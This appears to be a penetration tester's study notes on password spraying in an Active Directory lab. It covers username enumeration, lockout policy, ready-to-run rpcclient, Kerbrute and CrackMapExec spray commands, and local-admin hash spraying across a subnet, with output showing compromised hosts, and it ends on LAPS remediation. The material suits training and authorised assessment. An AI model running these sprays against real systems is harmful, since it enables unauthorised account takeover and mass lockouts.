Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Password Spraying Overview

Password spraying is a technique used to gain access to systems by attempting to log into an exposed service using one common password against a long list of usernames or email addresses. Unlike brute-forcing (many passwords against one account), password spraying is a measured approach that reduces the risk of account lockouts.

Key Concepts

  • Usernames/emails are typically gathered during OSINT or initial enumeration phases.
  • The attack tries a single common password (e.g., Welcome1, Passw0rd, Winter2022) across all target accounts, then rotates to the next password after a delay.
  • Effective for gaining an initial foothold or moving laterally within a network.

Username List Building Techniques

  • Common username lists: e.g., jsmith.txt from the statistically-likely-usernames GitHub repo.
  • LinkedIn scraping: Combine scraped names with common username formats.
  • Kerbrute: Enumerate valid domain users by testing candidate usernames against Kerberos.
  • Document metadata: Search for published PDFs/documents and inspect the Author field to discover internal username formats. Always scrub metadata before publishing documents.

Real-World Scenarios

  1. Standard enumeration: Combined a common username list with LinkedIn results, validated users with Kerbrute, then sprayed with Welcome1. Two low-privileged hits were enough to run BloodHound and identify attack paths to domain compromise.
  2. Custom username format: Discovered a 4-character GUID format (A-Z, 0-9) from PDF metadata. Generated all 1,679,616 possible combinations with a bash script, enumerated every domain account, then sprayed to gain credentials and followed a chain involving RBCD and Shadow Credentials to compromise the domain.

Account Lockout Considerations

  • Risk: Careless spraying can lock out hundreds of production accounts.
  • Mitigation: Always introduce a delay between password attempts.
  • Common policy: 5 bad attempts before lockout, 30-minute auto-unlock threshold.
  • Best practice: Obtain the domain password policy before spraying. If unknown, wait a few hours between attempts or limit to a single “hail mary” attempt with one weak password.
  • Internal access advantage: With domain access, you can enumerate the password policy directly, significantly lowering lockout risk.

Password Spray Pattern

RoundAction
1Try Password A against all users
DELAYWait for lockout threshold to reset
2Try Password B against all users
DELAYWait again
3Try Password C against all users

Internal Password Spraying from Linux

Once a wordlist has been created, it’s time to execute the attack. This is one of the two main avenues for gaining domain credentials, but must be approached cautiously to avoid lockouts.

Using rpcclient (Bash One-Liner)

rpcclient is a good option for spraying from Linux. A successful login is indicated by Authority Name in the response. Filter for it with grep:

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

Example output:

Account Name: tjohnson, Authority Name: INLANEFREIGHT
Account Name: sgage, Authority Name: INLANEFREIGHT

Using Kerbrute

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1

Using CrackMapExec

CrackMapExec accepts a text file of usernames to spray a single password. Grep for + to filter out logon failures:

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

Validate a confirmed credential against the DC:

sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123

Local Administrator Password Reuse

If you obtain the NTLM hash or cleartext password for a local administrator account, it can be sprayed across multiple hosts. This is common due to gold images and shared passwords in automated deployments. Target high-value hosts (SQL, Exchange) as they are more likely to have privileged credentials in memory.

Password Format Patterns to Try

  • If a desktop has $desktop%@admin123, try $server%@admin123 on servers.
  • If a non-standard local admin account like bsmith is found, try the same password on a similarly named domain account.
  • If you get credentials for ajones, try the same password on ajones_adm.
  • Credentials for a user in Domain A may be valid for a similar user in Domain B (domain trust scenarios).

Local Admin Spraying with CrackMapExec

Spray an NT hash across a subnet using --local-auth to attempt only one login per machine (prevents locking out the built-in domain administrator):

sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

Example output:

SMB  172.16.5.50   445  ACADEMY-EA-MX01  [+] ACADEMY-EA-MX01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB  172.16.5.25   445  ACADEMY-EA-MS01  [+] ACADEMY-EA-MS01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB  172.16.5.125  445  ACADEMY-EA-WEB0  [+] ACADEMY-EA-WEB0\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)

Note: This technique is noisy and not suited for stealth assessments, but should always be checked and reported.

Remediation

Use Microsoft’s free Local Administrator Password Solution (LAPS) to have Active Directory manage local admin passwords, enforcing a unique password on each host that rotates on a set interval.